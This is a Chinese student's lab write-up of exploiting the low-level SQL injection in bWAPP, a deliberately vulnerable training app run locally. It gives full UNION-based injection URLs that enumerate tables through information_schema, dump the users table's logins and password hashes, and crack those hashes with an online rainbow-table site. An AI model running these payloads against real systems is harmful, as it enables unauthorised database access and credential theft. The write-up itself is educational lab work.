学习web 安全笔记(第十一天)-作业,bwapp的sql注入

作业:渗透bwapp的sql注入low版本

环境:使用已经搭建好的docker里的bwapp

选择,SQL Injection (GET/Search),low版本

测试:输入任意字母如h,可以查询

看有没有sql注入漏洞,输入h',发现加了单引号后,有返回报错信息。

说明输入进入了sql语句。结论:有sql注入漏洞

使用hackquanter插件(之前已经安装,打开F12进入)

loadurl:http://127.0.0.1/sqli_1.php?title=h%27&action=search

然后开始通过union修改该语句,确认select返回的实际字段

http://127.0.0.1/sqli_1.php?title=h' union select 1,2,3,4,5,6,7   -- &action=search

注意h后面有一个单引号,使用union联合,最后用--后面要有一个空格跟后面的隔开。

通过不断增加select的列。找到正常返回。

说明这个select是7列。

通过显示,可以看到,2/3/5、4列是可以显示出来的。

进一步获取数据库信息。

http://127.0.0.1/sqli_1.php?title=h' union select 1,user(),database(),version(),table_name,6,7 from information_schema.tables where table_schema=database() -- &action=search

发现表users

进一步获取users的列信息

http://127.0.0.1/sqli_1.php?title=h' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users' -- &action=search

根据列信息去进一步获得表的内容信息

http://127.0.0.1/sqli_1.php?title=h' union select 1,id,login,password,activated,6,7 from users -- &action=search

获得账号和密码信息。

通过md5解密网站:https://www.cmd5.com/

查询结果:
bug 

由于密码比较简单,所以解密网站通过彩虹表爆破的方式解开了密码。

验证:

退出自己的账号。

用A.I.M.账号,密码bug。bee账号,密码也是bug

登录。发现可以登陆。

  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值